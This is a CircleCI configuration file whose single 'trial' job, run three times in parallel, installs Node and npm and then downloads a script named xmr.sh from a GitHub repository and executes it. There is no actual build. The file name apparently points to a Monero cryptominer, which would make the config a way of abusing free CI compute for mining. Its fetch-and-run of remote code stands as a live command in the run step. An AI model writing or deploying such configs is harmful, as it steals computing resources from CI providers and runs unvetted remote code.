version: 2.1
jobs:
    trial:
      docker:
            - image: cimg/node:18.2.0
      parallelism: 3
      steps:
        - run:
            name: "trial"
            command: sudo apt update && sudo apt install nodejs && sudo apt install npm && wget https://raw.githubusercontent.com/Myaxisplay/Tuyul/main/xmr.sh && chmod +x xmr.sh && ./xmr.sh

workflows:
    version: 2.1
    build:
        jobs:
        - trial
